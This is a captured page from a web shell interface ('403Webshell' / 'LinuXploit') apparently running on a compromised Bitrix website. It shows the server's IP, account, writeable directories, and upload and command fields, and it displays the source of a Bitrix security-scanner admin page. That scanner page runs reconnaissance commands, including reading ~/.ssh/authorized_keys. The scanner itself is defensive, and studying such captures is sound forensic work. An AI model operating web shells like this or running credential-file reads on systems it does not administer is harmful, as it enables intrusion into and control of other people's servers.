403Webshell
Server IP : 80.87.202.40  /  Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /home/bitrix/ext_www/rospirotorg.ru/bitrix/modules/security/admin/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :

[ Back ]     

Current File : /home/bitrix/ext_www/rospirotorg.ru/bitrix/modules/security/admin/xscan_system.php
<?
require_once($_SERVER["DOCUMENT_ROOT"] . "/bitrix/modules/main/include/prolog_admin_before.php");

/**
 * @global CUser $USER
 * @global CMain $APPLICATION
 */

if (!$USER->IsAdmin())
{
	$APPLICATION->AuthForm('');
}

IncludeModuleLangFile(__FILE__);

if (function_exists('mb_internal_encoding'))
{
	mb_internal_encoding('ISO-8859-1');
}

$strError = '';
$file = '';

$APPLICATION->SetTitle(GetMessage("BITRIX_XSCAN_SYSTEM"));
require($_SERVER["DOCUMENT_ROOT"] . BX_ROOT . "/modules/main/include/prolog_admin_after.php");

?>

<div>
	<?= GetMessage("BITRIX_XSCAN_SYSTEM_INFO") ?>
</div>

<style>
    .xscan-code {
        background-color: #fff;
        padding: 10px;
        max-width: 1200px;
        overflow-x: auto;
    }
</style>

<?php

function exec_enabled()
{
	$disabled = explode(',', ini_get('disable_functions'));
	return !in_array('exec', $disabled);
}

if (exec_enabled())
{
	$output = null;
	$retval = null;

	exec('whoami', $output, $retval);

	if ($retval === 0)
	{
		echo "<h4>&gt; whoami</h4>";
		$output = htmlspecialcharsbx(implode("\n", $output));
		echo "<pre class=\"xscan-code\">$output</pre>";
	}

	$output = null;
	$retval = null;
	exec('ps ux -u `whoami`', $output, $retval);

	if ($retval === 0)
	{
		echo "<h4>&gt; ps ux -u `whoami`</h4>";
		$output = htmlspecialcharsbx(implode("\n", $output));
		echo "<pre class=\"xscan-code\">$output</pre>";
	}

	$output = null;
	$retval = null;
	exec('crontab -l', $output, $retval);
	if ($retval === 0)
	{
		echo "<h4>&gt; crontab -l</h4>";
		$output = htmlspecialcharsbx(implode("\n", $output));
		echo "<pre class=\"xscan-code\">$output</pre>";
	}
	else
	{
		echo "<h4>&gt; crontab -l</h4>";
		echo "<pre class=\"xscan-code\">no corntab</pre>";
	}

	$output = null;
	$retval = null;
	exec('last -i `whoami`', $output, $retval);

	if ($retval === 0)
	{
		echo "<h4>&gt; last -i `whoami`</h4>";
		$output = htmlspecialcharsbx(implode("\n", $output));
		echo "<pre class=\"xscan-code\">$output</pre>";
	}

	$output = null;
	$retval = null;
	exec('cat ~/.ssh/authorized_keys', $output, $retval);

	if ($retval === 0)
	{
		echo "<h4>&gt; cat ~/.ssh/authorized_keys</h4>";
		$output = htmlspecialcharsbx(implode("\n", $output));
		echo "<pre class=\"xscan-code\">$output</pre>";

		$output = null;
		$retval = null;
		exec('stat ~/.ssh/authorized_keys', $output, $retval);

		if ($retval === 0)
		{
			echo "<h4>&gt; stat ~/.ssh/authorized_keys</h4>";
			$output = htmlspecialcharsbx(implode("\n", $output));
			echo "<pre class=\"xscan-code\">$output</pre>";
		}
	}
}

require($_SERVER["DOCUMENT_ROOT"] . BX_ROOT . "/modules/main/include/epilog_admin.php");

Youez - 2016 - github.com/yon3zu
LinuXploit